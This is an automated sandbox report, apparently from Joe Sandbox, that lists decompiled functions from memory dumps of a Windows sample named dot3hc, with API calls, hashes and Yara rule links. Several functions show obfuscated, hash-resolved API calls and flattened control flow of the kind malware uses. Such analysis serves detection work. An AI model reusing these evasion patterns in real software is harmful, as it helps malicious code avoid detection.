0x02306c6a
0x02306c26
0x02306c28
0x02306c28
0x00000000

APIs

QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 02306C1D
lstrcmpiW.KERNELBASE(?,?), ref: 02306C54

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: FullImageNameProcessQuerylstrcmpi
String ID:
API String ID: 2545454535-0
Opcode ID: 5dfd3e8c6682f6c2c25700c613ab13e3214481ee3b8306550b88c3a18468c797
Instruction ID: b1cfc1176f8bfa462aa2622817e3264d255b59a14bb89ddd107b98e1dd9ac983
Opcode Fuzzy Hash: 5dfd3e8c6682f6c2c25700c613ab13e3214481ee3b8306550b88c3a18468c797
Instruction Fuzzy Hash: A41138B130831557D538E5649CE5ABFA6CEDBC4754F50093BED02C72C4CF61C9898AB2

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3F7, Relevance: 3.1, APIs: 2, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040D3F7(void* __ecx) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t28;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t43;
				struct HINSTANCE__* _t44;
				intOrPtr _t45;
				void* _t47;
				intOrPtr _t48;
				signed int _t49;
				void* _t51;

				_t49 = _t51 - 0x1b0;
				_t28 =  *0x443590; // 0x8ffedb05
				 *(_t49 + 0x1ac) = _t28 ^ _t49;
				_push(_t43);
				_t47 = __ecx;
				E0040D31A(_t28 ^ _t49, _t38, __ecx, _t42, _t43, __ecx);
				_t44 =  *(__ecx + 8);
				 *(_t49 + 0x1aa) =  *(_t49 + 0x1aa) & 0x00000000;
				 *(_t49 + 0x1a8) =  *(_t49 + 0x1a8) & 0x00000000;
				if(GetModuleFileNameW(_t44, _t49 - 0x60, 0x105) != 0) {
					if( *(_t49 + 0x1a8) == 0) {
						 *((intOrPtr*)(_t49 - 0x78)) = _t49 - 0x60;
						_push(_t49 - 0x80);
						 *((intOrPtr*)(_t49 - 0x80)) = 0x20;
						 *((intOrPtr*)(_t49 - 0x7c)) = 0x88;
						 *((intOrPtr*)(_t49 - 0x6c)) = 2;
						 *(_t49 - 0x64) = _t44;
						_t32 = E0040D388(); // executed
						 *(_t47 + 0x80) = _t32;
						if(_t32 == 0xffffffff) {
							_push(_t49 - 0x80);
							 *((intOrPtr*)(_t49 - 0x6c)) = 3;
							_t32 = E0040D388(); // executed
							 *(_t47 + 0x80) = _t32;
						}
						if( *(_t47 + 0x80) == 0xffffffff) {
							_push(_t49 - 0x80);
							 *((intOrPtr*)(_t49 - 0x6c)) = 1;
							_t32 = E0040D388(); // executed
							 *(_t47 + 0x80) = _t32;
							if(_t32 == 0xffffffff) {
								 *(_t47 + 0x80) =  *(_t47 + 0x80) & 0x00000000;
							}
						}
					} else {
						SetLastError(0x6f);
					}
				}
				_pop(_t45);
				_pop(_t48);
				return E0041E5DF(_t32, _t38,  *(_t49 + 0x1ac) ^ _t49, _t42, _t45, _t48);
			}

APIs

Part of subcall function 0040D31A: GetModuleHandleA.KERNEL32(KERNEL32), ref: 0040D328

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0040D438
SetLastError.KERNEL32(0000006F), ref: 0040D452

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Module$ErrorFileHandleLastName
String ID:
API String ID: 613274587-0
Opcode ID: 1140d22a4bc11586fb8b33a2693fa1d88d0dedf6a9c8d0f90cf5dd9a28d1640f
Instruction ID: 4c084dd07903f31f2770e49e5958585a6a5082f204e8c6cb463d0be25484e369
Opcode Fuzzy Hash: 1140d22a4bc11586fb8b33a2693fa1d88d0dedf6a9c8d0f90cf5dd9a28d1640f
Instruction Fuzzy Hash: 4C213D71D003088EEB60DFA5D8487EEB7B8BB05318F50463EE869AA1C1DB786549CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00422C5D, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00422C5D(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4468d0 = _t6;
				if(_t6 != 0) {
					_t7 = E00422C02(__eflags);
					__eflags = _t7 - 3;
					 *0x448500 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E00422E5E(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x4468d0);
							 *0x4468d0 =  *0x4468d0 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0041F5BB,00000001), ref: 00422C6E
HeapDestroy.KERNEL32 ref: 00422CA4

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: e3816043460115e40a224fd5a361c21cc7ac43806d8953fad7d81c4a3159e2c6
Instruction ID: 50605b1b86adc46f172317f474ea2ef838b38f67434d95992fa8f4b769136fec
Opcode Fuzzy Hash: e3816043460115e40a224fd5a361c21cc7ac43806d8953fad7d81c4a3159e2c6
Instruction Fuzzy Hash: 9EE06D35715322BAEB047F32BF0576A36E4A742746F41443AF501C50A0FBB88550961E

Uniqueness

Uniqueness Score: -1.00%

Function 004080C3, Relevance: 3.0, APIs: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004080C3(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
				_Unknown_base(*)()* _t11;
				long _t12;
				intOrPtr* _t17;

				_t17 = __ecx;
				_t11 =  *(__ecx + 0x40);
				if(_t11 != 0) {
					L3:
					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x20), _a4, _a8, _a12); // executed
					return _t12;
				}
				_t11 =  *( *((intOrPtr*)( *__ecx + 0xf0))());
				if(_t11 != 0) {
					goto L3;
				}
				return DefWindowProcA( *(__ecx + 0x20), _a4, _a8, _a12);
			}

0x004080c7
0x004080c9
0x004080ce
0x004080f2
0x004080ff
0x00000000
0x004080ff
0x004080d8
0x004080dc
0x00000000
0x00000000
0x00000000

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 004080EA
CallWindowProcA.USER32 ref: 004080FF

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: ProcWindow$Call
String ID:
API String ID: 2316559721-0
Opcode ID: ded2b2c8f4ccecfeb941fad25af2ba88284cf4473edce49357e56aebb3a01b73
Instruction ID: faabefe62c7c53f3fdcbf67010fdb8b980cc00f1b023ec64b7b1c68eccc98f5b
Opcode Fuzzy Hash: ded2b2c8f4ccecfeb941fad25af2ba88284cf4473edce49357e56aebb3a01b73
Instruction Fuzzy Hash: 84F0AC36100215EFCF119F94DC04DDA7BB9FF19350B058429FA85D6561EB72E820AF54

Uniqueness

Uniqueness Score: -1.00%

Function 004099F5, Relevance: 3.0, APIs: 2, Instructions: 18
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004099F5(void* __ecx) {
				struct HINSTANCE__* _t11;
				signed int _t12;
				void* _t15;

				_t15 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_t11 = GetModuleHandleA( *(__ecx + 0xc)); // executed
					 *(_t15 + 4) = _t11;
					if(_t11 == 0) {
						_t12 = LoadLibraryA( *(_t15 + 0xc));
						 *(_t15 + 4) = _t12;
						 *((char*)(_t15 + 8)) = _t12 & 0xffffff00 | _t12 != 0x00000000;
					}
				}
				return  *(_t15 + 4);
			}

0x004099f6
0x004099fc
0x00409a01
0x00409a09
0x00409a0c
0x00409a11
0x00409a19
0x00409a1f
0x00409a1f
0x00409a0c
0x00409a26

APIs

GetModuleHandleA.KERNELBASE(?,?,00409AD8,InitCommonControlsEx,00000000,0040A1DC,00040000,00008000,?,?,0040C810,00401257,00040000,00000000,?), ref: 00409A01
LoadLibraryA.KERNEL32(?,?,00409AD8,InitCommonControlsEx,00000000,0040A1DC,00040000,00008000,?,?,0040C810,00401257,00040000,00000000,?), ref: 00409A11

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 99fdbea0dc4889e037225810345119da6f3f7b98ba3af548d8b61604cfbc3950
Instruction ID: 9317f629b01d5a5b7a74bb67438dee8f2f814220c5d55638b190b1096b737129
Opcode Fuzzy Hash: 99fdbea0dc4889e037225810345119da6f3f7b98ba3af548d8b61604cfbc3950
Instruction Fuzzy Hash: 80E0BF31612750CFC7248F29E9047877BE4EF14710711C47EE4AAD2A61E734EC40CB04

Uniqueness

Uniqueness Score: -1.00%

Function 004051C9, Relevance: 3.0, APIs: 2, Instructions: 15
threadCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004051C9(void* __esi, void* __eflags) {
				void* _t3;
				void* _t4;
				struct HHOOK__* _t6;
				void* _t7;
				void* _t8;

				_t3 = E0040DB94(_t7, _t8, __esi, __eflags);
				_t13 =  *((char*)(_t3 + 0x14));
				if( *((char*)(_t3 + 0x14)) == 0) {
					_push(__esi);
					_t4 = E0040D673(_t7, _t8, __esi, _t13);
					_t6 = SetWindowsHookExA(0xffffffff, E00405035, 0, GetCurrentThreadId()); // executed
					 *(_t4 + 0x2c) = _t6;
					return _t6;
				}
				return _t3;
			}

0x004051c9
0x004051ce
0x004051d2
0x004051d4
0x004051d5
0x004051ec
0x004051f2
0x00000000
0x004051f5
0x004051f6

APIs

GetCurrentThreadId.KERNEL32 ref: 004051DC
SetWindowsHookExA.USER32 ref: 004051EC

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CurrentHookThreadWindows
String ID:
API String ID: 1904029216-0
Opcode ID: 2badf78d1823c855d47da0a188e546955e8ac16bfe00ce0fae403d97928034df
Instruction ID: d2475072599357dfe44180b5e05b1154fe7956b612fa810acb3a96ea88ad64ab
Opcode Fuzzy Hash: 2badf78d1823c855d47da0a188e546955e8ac16bfe00ce0fae403d97928034df
Instruction Fuzzy Hash: C7D0A771C046502EDB202FB07C0DB8B3B548B04370F1207B6F420761E1C97CA4854F9D

Uniqueness

Uniqueness Score: -1.00%

Function 023069ED, Relevance: 1.6, APIs: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E023069ED() {
				short _v520;
				void* _v524;
				void* _v528;
				char _v532;
				void* _t11;
				void* _t15;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t38;
				intOrPtr _t41;
				void* _t64;

				_t64 = _v528;
				_t11 = 0x4b873b7;
				while(1) {
					L1:
					_t38 = 0x2f2b4fae;
					L2:
					while(_t11 != 0x4b873b7) {
						if(_t11 == 0x67b0e11) {
							E02302F84(0xf568ce83, 0x4129e1b9, 0x2e);
							_t15 = FindFirstChangeNotificationW( &_v520, 0, 1); // executed
							_t64 = _t15;
							if(E02306B8A() == 0) {
								goto L14;
							} else {
								_t41 =  *0x230a4c8; // 0x5b1e18
								_push( *((intOrPtr*)(_t41 + 0x28)));
								goto L12;
							}
						} else {
							if(_t11 == 0x22908104) {
								_push(_t64);
								 *((intOrPtr*)(E02302F84(0xf568ce83, 0x278beec6, 0x295)))();
							} else {
								if(_t11 == 0x252ca1ce) {
									_push(0x104);
									_push( &_v520);
									_push(0);
									 *((intOrPtr*)(E02302F84(0xf568ce83, 0x738e43f2, 0x169)))();
									_push( &_v532);
									 *((short*)( *((intOrPtr*)(E02302F84(0x3b68b8a1, 0x478631ce, 0x6a)))())) = 0;
									_t11 = 0x67b0e11;
									goto L1;
								} else {
									if(_t11 == _t38) {
										if(E02306B8A() == 0) {
											_push(_t64);
											 *((intOrPtr*)(E02302F84(0xf568ce83, 0xb23a47fb, 0x108)))();
											L14:
											_t11 = 0x38b79919;
											while(1) {
												L1:
												_t38 = 0x2f2b4fae;
												goto L2;
											}
										} else {
											_t30 =  *0x230a4c8; // 0x5b1e18
											_push( *((intOrPtr*)(_t30 + 0x28)));
											L12:
											 *((intOrPtr*)(E02302F84(0xf568ce83, 0x69121cc4, 0x1a8)))();
											_t11 = 0x22908104;
											while(1) {
												L1:
												_t38 = 0x2f2b4fae;
												goto L2;
											}
										}
									} else {
										if(_t11 != 0x38b79919) {
											L19:
											if(_t11 != 0x705a742) {
												continue;
											} else {
											}
										} else {
											_t31 =  *0x230a4c8; // 0x5b1e18
											_push(0xffffffff);
											_push(0);
											_v528 =  *(_t31 + 0x28);
											_push( &_v528);
											_push(2);
											_v524 = _t64;
											if( *((intOrPtr*)(E02302F84(0xf568ce83, 0xca2f56c, 0x17d)))() != 0) {
												_t38 = 0x2f2b4fae;
												_t11 =  ==  ? 0x2f2b4fae : 0x38b79919;
												continue;
											}
										}
									}
								}
							}
						}
						return 0;
					}
					_t11 = 0x252ca1ce;
					goto L19;
				}
			}

0x023069f6
0x023069fa
0x02306a0f
0x02306a0f
0x02306a0f
0x00000000
0x02306a14
0x02306a24
0x02306b33
0x02306b39
0x02306b3b
0x02306b44
0x00000000
0x02306b46
0x02306b46
0x02306b4c
0x00000000
0x02306b4c
0x02306a2a
0x02306a2c
0x02306b66
0x02306b79
0x02306a32
0x02306a37
0x02306ad9
0x02306ae7
0x02306ae8
0x02306af7
0x02306b02
0x02306b14
0x02306b17
0x00000000
0x02306a3d
0x02306a3f
0x02306a98
0x02306abd
0x02306ad0
0x02306ad2
0x02306ad2
0x02306a0f
0x02306a0f
0x02306a0f
0x00000000
0x02306a0f
0x02306a9a
0x02306a9a
0x02306a9f
0x02306aa2
0x02306ab4
0x02306ab6
0x02306a0f
0x02306a0f
0x02306a0f
0x00000000
0x02306a0f
0x02306a0f
0x02306a41
0x02306a43
0x02306b59
0x02306b5e
0x00000000
0x00000000
0x02306b64
0x02306a49
0x02306a49
0x02306a53
0x02306a55
0x02306a5c
0x02306a64
0x02306a65
0x02306a6c
0x02306a7c
0x02306a87
0x02306a8c
0x00000000
0x02306a8c
0x02306a7c
0x02306a43
0x02306a3f
0x02306a37
0x02306a2c
0x02306b87
0x02306b87
0x02306b54
0x00000000
0x02306b54

APIs

FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 02306B39

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: ChangeFindFirstNotification
String ID:
API String ID: 1065410024-0
Opcode ID: 91d006e15cb97cd058256a02d065a481a92146fc24053615573ff2c4a4d8ed83
Instruction ID: 0b67ce609fcb1d863d4681b43c50e65f22e8269113ebc4e2a9d353e13410cb5b
Opcode Fuzzy Hash: 91d006e15cb97cd058256a02d065a481a92146fc24053615573ff2c4a4d8ed83
Instruction Fuzzy Hash: B83127B03443025BDA28A6555CF2B7F629ECB84354F24491AFD15DB3D4CA61CCA1CB72

Uniqueness

Uniqueness Score: -1.00%

Function 022E1D10, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91d5ed7235d8a05eafef979527917f5a496c5a4e54ae574ee2da5ffb13ba0340
Instruction ID: 0c98aaf483717d3076aee7be4de56651dace5e8f74d8492bf10e4a7c7d8e9eef
Opcode Fuzzy Hash: 91d5ed7235d8a05eafef979527917f5a496c5a4e54ae574ee2da5ffb13ba0340
Instruction Fuzzy Hash: 3141C674A10109AFDB04DF84C494BAEB7B2FB88314F54C169E81A5B359C775EE92DB80

Uniqueness

Uniqueness Score: -1.00%

Function 02305AA1, Relevance: 1.6, APIs: 1, Instructions: 108
fileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E02305AA1() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				void* _v572;
				void* _t14;
				intOrPtr* _t17;
				void* _t19;
				intOrPtr* _t24;
				void* _t26;
				void* _t30;
				void* _t37;
				void* _t39;
				signed int _t41;
				void* _t43;

				_t26 = _v572;
				_t41 = 0x17978d81;
				_t39 = 0;
				do {
					while(_t41 != 0xaceab63) {
						if(_t41 == 0xba3fea7) {
							_push(_t39);
							_push(_t39);
							_push(3);
							_push(_t39);
							_push(1);
							_push(0x80);
							_t37 = 0xb82a8ec3;
							_push( &_v524);
							E02302F84(0xf568ce83, 0xb82a8ec3, 0x1a);
							_pop(_t30); // executed
							_t14 = CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
							_t26 = _t14;
							__eflags = _t26 - 0xffffffff;
							if(_t26 == 0xffffffff) {
								L19:
								return _t39;
							}
							_t41 = 0x308611ab;
							continue;
						}
						if(_t41 == 0x17978d81) {
							_t41 = 0x1f766521;
							continue;
						}
						if(_t41 == 0x1f766521) {
							_t37 = 0x738e43f2;
							_t17 = E02302F84(0xf568ce83, 0x738e43f2, 0x169);
							_t30 = _t39;
							 *_t17( &_v524, 0x104);
							_t41 = 0xba3fea7;
							continue;
						}
						if(_t41 == 0x269b685a) {
							_t19 = E0230438D(_t30, _t37);
							_t43 = _v572 - _v548;
							asm("sbb ecx, [esp+0x2c]");
							__eflags = _v568 - _t37;
							if(__eflags < 0) {
								goto L19;
							}
							if(__eflags > 0) {
								L18:
								_t39 = 1;
								__eflags = 1;
								goto L19;
							}
							__eflags = _t43 - _t19;
							if(_t43 < _t19) {
								goto L19;
							}
							goto L18;
						}
						if(_t41 == 0x308611ab) {
							 *((intOrPtr*)(E02302F84(0xf568ce83, 0x854b8830, 0x4c)))();
							_t37 = 0x2e998fdc;
							asm("sbb esi, esi");
							_t41 = (_t41 & 0xe8cf945b) + 0x21ff1708;
							_t24 = E02302F84(0xf568ce83, 0x2e998fdc, 0x167);
							_t30 = _t26;
							 *_t24(_t26, _t39,  &_v564, 0x28);
						}
						goto L13;
					}
					_push( &_v572);
					 *((intOrPtr*)(E02302F84(0xf568ce83, 0xac6e2571, 0x1fb)))();
					_t41 = 0x269b685a;
					L13:
				} while (_t41 != 0x21ff1708);
				goto L19;
			}

0x02305aa8
0x02305aaf
0x02305ab4
0x02305abb
0x02305abb
0x02305acd
0x02305b76
0x02305b77
0x02305b78
0x02305b7a
0x02305b7b
0x02305b7d
0x02305b86
0x02305b8b
0x02305b90
0x02305b95
0x02305b96
0x02305b98
0x02305b9a
0x02305b9d
0x02305bf7
0x02305c03
0x02305c03
0x02305b9f
0x00000000
0x02305b9f
0x02305ad9
0x02305b6c
0x00000000
0x02305b6c
0x02305ae5
0x02305b4c
0x02305b5a
0x02305b5f
0x02305b60
0x02305b62
0x00000000
0x02305b62
0x02305aed
0x02305bd5
0x02305bde
0x02305be6
0x02305bea
0x02305bec
0x00000000
0x00000000
0x02305bee
0x02305bf4
0x02305bf6
0x02305bf6
0x00000000
0x02305bf6
0x02305bf0
0x02305bf2
0x00000000
0x00000000
0x00000000
0x02305bf2
0x02305af9
0x02305b17
0x02305b1b
0x02305b21
0x02305b30
0x02305b36
0x02305b3b
0x02305b3c
0x02305b3c
0x00000000
0x02305af9
0x02305bb2
0x02305bc0
0x02305bc2
0x02305bc7
0x02305bc7
0x00000000

APIs

CreateFileW.KERNELBASE(?,00000080,00000001,00000000,00000003,00000000,00000000,?,2895FB0B,?,?), ref: 02305B96

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 727a16866b20b17e7bd20a99c9fb0f2b9f5606ecfee9563051ca270abacf030b
Instruction ID: 368c2ca0f223c23f9a880655dd22f69253e503c86b2fab4e052684639cb8475b
Opcode Fuzzy Hash: 727a16866b20b17e7bd20a99c9fb0f2b9f5606ecfee9563051ca270abacf030b
Instruction Fuzzy Hash: 5531A862A443151BD934A46C4CE4E7FA29EEBC0310F88401AFE65AB2C0CE219D088FB2

Uniqueness

Uniqueness Score: -1.00%

Function 02306C6B, Relevance: 1.6, APIs: 1, Instructions: 64
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E02306C6B(void* __edx) {
				void* _t5;
				void* _t7;
				intOrPtr _t11;
				intOrPtr _t17;
				intOrPtr _t20;
				long _t21;

				_t5 = 0x32041aca;
				while(_t5 != 0x243b5bf4) {
					if(_t5 == 0x24b7ea00) {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_t11 =  *((intOrPtr*)(E02302F84(0xf568ce83, 0x7a3299e5, 0x8a)))();
						_t20 =  *0x230a4c8; // 0x5b1e18
						 *((intOrPtr*)(_t20 + 0x28)) = _t11;
						_t5 = 0x243b5bf4;
						continue;
					} else {
						if(_t5 != 0x32041aca) {
							L8:
							if(_t5 != 0x1ef7700d) {
								continue;
							}
						} else {
							_t21 = 0x3c;
							_t20 = E02303037(_t21);
							 *0x230a4c8 = _t20;
							if(_t20 != 0) {
								_t5 = 0x24b7ea00;
								continue;
							}
						}
					}
					return 0 | _t20 != 0x00000000;
				}
				E02302F84(0xf568ce83, 0x83117ba, 0x1d1);
				_t7 = CreateThread(0, 0, E023069ED, 0, 0, 0);
				_t17 =  *0x230a4c8; // 0x5b1e18
				 *(_t17 + 0x38) = _t7;
				_t5 = 0x1ef7700d;
				goto L8;
			}

0x02306c7f
0x02306c88
0x02306c8e
0x02306cac
0x02306cad
0x02306cae
0x02306caf
0x02306cc5
0x02306cc7
0x02306ccd
0x02306cd0
0x00000000
0x02306c90
0x02306c92
0x02306d03
0x02306d08
0x00000000
0x00000000
0x02306c94
0x02306c96
0x02306c9c
0x02306c9e
0x02306ca6
0x02306ca8
0x00000000
0x02306ca8
0x02306ca6
0x02306c92
0x02306d19
0x02306d19
0x02306ced
0x02306cf3
0x02306cf5
0x02306cfb
0x02306cfe
0x00000000

APIs

CreateThread.KERNELBASE(00000000,00000000,023069ED,00000000,00000000,00000000,?,2895FB0B,?,?,02304C46), ref: 02306CF3

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c4c6592be231ddf0af58da8eeb35df0b39591f79b933f47bb8c7e2760f70c365
Instruction ID: 597ad8927a7f810df0986f08d9cd9043b34342b801dd444f654c45b9ba565f6a
Opcode Fuzzy Hash: c4c6592be231ddf0af58da8eeb35df0b39591f79b933f47bb8c7e2760f70c365
Instruction Fuzzy Hash: 94018E243823116BD638996A6CF9E6B2A4DCF85675720042FF90DCB7C8CB21CC61CB70

Uniqueness

Uniqueness Score: -1.00%

Function 02303C56, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E02303C56() {
				long _v8;
				short _v528;
				intOrPtr* _t13;

				_push(0x104);
				_push( &_v528);
				_v8 = 0;
				if( *((intOrPtr*)(E02302F84(0xf568ce83, 0x192bc04b, 0x26)))() != 0) {
					_t13 =  &_v528;
					if(_v528 != 0) {
						while( *_t13 != 0x5c) {
							_t13 = _t13 + 2;
							if( *_t13 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						 *((short*)(_t13 + 2)) = 0;
					}
					L6:
					E02302F84(0xf568ce83, 0xf0a36707, 0xbc);
					GetVolumeInformationW( &_v528, 0, 0,  &_v8, 0, 0, 0, 0); // executed
				}
				return _v8;
			}

0x02303c60
0x02303c6d
0x02303c75
0x02303c87
0x02303c89
0x02303c96
0x02303c98
0x02303c9e
0x02303ca4
0x00000000
0x00000000
0x02303ca6
0x00000000
0x02303ca4
0x02303caa
0x02303caa
0x02303cae
0x02303cce
0x02303cd4
0x02303cd4
0x02303cdd

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02303CD4

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 526540498414afc7a9409e39192442dbad502c389ee1e6e538a6c4f33c4457d3
Instruction ID: 9cc9c4dcd10e7750473063f400c163ae54f48092b4d9abc794d1bf6f4704d1b0
Opcode Fuzzy Hash: 526540498414afc7a9409e39192442dbad502c389ee1e6e538a6c4f33c4457d3
Instruction Fuzzy Hash: FC01D4A1901324A7DB34E7659C9DEEBBBBCDF45250F5081C6A819DB1C0D7718E80C6F0

Uniqueness

Uniqueness Score: -1.00%

Function 023032DF, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E023032DF(void* __edx) {
				intOrPtr _v4;
				char _v16;
				void* __ecx;
				void* _t8;
				void* _t11;
				void* _t23;
				void* _t24;

				_t24 = 0;
				_v4 = 0x104;
				_push(0);
				_t11 = __edx;
				_push(0x1000);
				_t23 =  *((intOrPtr*)(E02302F84(0xf568ce83, 0x3f0572f9, 0x128)))();
				if(_t23 != 0) {
					_push( &_v16);
					_push(_t11);
					_push(0);
					_push(_t23);
					_t8 =  *((intOrPtr*)(E02302F84(0xf568ce83, 0xa87adc75, 0xf3)))(); // executed
					_push(_t23);
					_t24 = _t8;
					 *((intOrPtr*)(E02302F84(0xf568ce83, 0x2e998fdc, 0x167)))();
				}
				return _t24;
			}

0x023032e5
0x023032e7
0x023032ef
0x023032f0
0x023032f7
0x02303310
0x02303314
0x0230331f
0x02303320
0x02303321
0x02303322
0x02303330
0x02303332
